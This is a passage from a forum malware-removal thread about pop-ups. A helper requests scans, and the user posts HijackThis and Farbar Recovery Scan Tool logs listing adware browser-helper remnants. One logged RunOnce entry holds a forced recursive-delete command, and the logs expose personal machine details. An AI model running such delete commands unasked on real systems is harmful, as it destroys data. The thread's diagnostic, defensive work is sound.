O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-2977827394-2594518940-965070511-1000\..\Run: [Sidebar] C:\Program Files\Windows Sidebar

\sidebar.exe /autoRun (User 'Bonnie')
O4 - HKUS\S-1-5-18\..\RunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect" (User 'Default user')
O4 - S-1-5-21-2977827394-2594518940-965070511-1000 Startup: Dropbox.lnk = Bonnie\AppData\Roaming\Dropbox\bin

\Dropbox.exe (User 'Bonnie')
O4 - S-1-5-21-2977827394-2594518940-965070511-1000 User Startup: Dropbox.lnk = Bonnie\AppData\Roaming\Dropbox\bin

\Dropbox.exe (User 'Bonnie')
O4 - Global Startup: Event Reminder.lnk = C:\Program Files (x86)\The Print Shop 23.1\Remind.exe
O4 - Global Startup: ImageBrowser EX Agent.lnk = C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security

14.0.0\ie_banner_deny.htm
O9 - Extra button: Virtual Keyboard - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky

Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-

8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 -

{219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft

Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files

(x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files

(x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files

(x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: URLs check - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab

\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {E4D88471-7ED7-43E1-B290-205559E8EBB2} (logoff Class) -

https://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
O16 - DPF: {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} (WebEnable Class) -

https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: NameServer = 8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\..\{39C34F84-4F8F-431C-AA97-5BDA129281FC}: NameServer = 8.8.8.8
O17 - HKLM\System\CS1\Services\Tcpip\..\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: NameServer = 8.8.8.8
O17 - HKLM\System\CS2\Services\Tcpip\..\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: NameServer = 8.8.8.8
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery

\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files

\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files

(x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:

\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file

missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support

\AppleMobileDeviceService.exe
O23 - Service: Kaspersky Anti-Virus Service (AVP) - Kaspersky Lab ZAO - C:\Program Files (x86)\Kaspersky Lab

\Kaspersky Internet Security 14.0.0\avp.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: BrYNSvc - Brother In

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #8 on: January 23, 2015, 08:48:05 AM »
Thanks for those logs, run another scan with FRST, see what the system looks like now...

Open FRST, make sure all boxes are checkmarked under "Whitelist" also make sure only Addition.txt is checkmarked under "Optional scan"

Post the two fresh logs...

Next,

Download Security Check by screen317 from either of the following:

http://screen317.spywareinfoforum.org/SecurityCheck.exe or http://screen317.changelog.fr/SecurityCheck.exe

Save it to your Desktop. (If your security alerts either accept the alert, or turn the security off while Secuirity Check runs)
Double click SecurityCheck.exe (Vista or Windows 7/8 users right click and select "Run as Administrator") and follow the onscreen instructions inside of the black box. Press any key when asked.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

If Security Check will not run or you get an alert saying it is not supported, Re-boot your PC then try again...

Let me see those logs in your next reply, also give an update on any remaining issues or concerns....

Thank you,

Kevin...

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #9 on: January 23, 2015, 07:35:33 PM »
Things are looking a lot better! Thanks!

Here are the logs (checkup log in next post):

FRST:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 19-01-2015
Ran by Admin (administrator) on LAWRENCE2 on 23-01-2015 18:12:07
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Acer Incorporated) C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Acer Incorporated) C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Spotify Ltd) C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
() C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
() C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Dropbox, Inc.) C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\wmi64.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10060320 2010-02-09] (Realtek Semiconductor)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-02-10] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [87336 2010-02-03] (CyberLink Corp.)
HKLM-x32\...\Run: [Hotkey Utility] => C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe [627304 2011-08-10] ()
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-11-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46368 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [29984 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PPort12reminder] => C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe [328992 2010-02-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKLM-x32\...\runonceex: [Flags] => 
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2014-10-14] (Microsoft Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [Spotify Web Helper] => C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1676344 2014-12-11] (Spotify Ltd)
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\The Print Shop 23.1\Remind.exe (Broderbund Properties LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk
ShortcutTarget: ImageBrowser EX Agent.lnk -> C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe ()
Startup: C:\Users\Bonnie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
HKU\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Internet Explorer\Main,First Home Page = http://g.msn.com/1me10IE10ENUS/WOL_WCP
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1008 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = http://www.google.com/search?q={searchTerms}
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll No File
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll No File
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll (Zeon Corporation)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
DPF: HKLM-x32 {E4D88471-7ED7-43E1-B290-205559E8EBB2} https://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
DPF: HKLM-x32 {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 10.10.10.254
Tcpip\..\Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}: [NameServer] 8.8.8.8

FireFox:
========
FF ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default
FF NewTab: about:newtab
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_16_0_0_257.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @canon.com/MycameraPlugin -> C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\1\NP_wtapp.dll ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2977827394-2594518940-965070511-1000: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101752.dll (Amazon.com, Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml
FF HKLM-x32\...\Firefox\Extensions: [url_advisor@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com
FF Extension: Модуль перевірки посилань - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [virtual_keyboard@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com
FF Extension: Віртуальна клавіатура - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [content_blocker@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com
FF Extension: Модуль блокування небезпечних веб-сайтів - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com
FF Extension: Chặn quảng cáo - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com [2014-11-24]
FF HKLM-x32\...\Firefox\Extensions: [online_banking@kaspersky.com] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com
FF Extension: Безпечні платежі - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com [2014-11-24]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR HKLM\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [Not Found]
CHR HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Chrome\Extension: [mgekkbflbjgdcmbphhpaikbmjbifkaib] - C:\Users\Bonnie\AppData\Local\CRE\mgekkbflbjgdcmbphhpaikbmjbifkaib.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [dchlnpcodkpfdpacogkljefecpegganj] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [hakdifolhalapjijoafobooafbilfakh] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [hghkgaeecgjhjkannahfamoehjmkjail] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [jagncdcchgajhfhijbbhecadmaiegcmh] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx [2013-10-08]
CHR HKLM-x32\...\Chrome\Extension: [pjldcfjmnllhmgjclecdnfampinooman] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx [2013-10-08]
CHR StartMenuInternet: Google Chrome - C:\Users\Bonnie\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [214512 2013-10-08] (Kaspersky Lab ZAO)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [144672 2010-03-09] (Nuance Communications, Inc.)
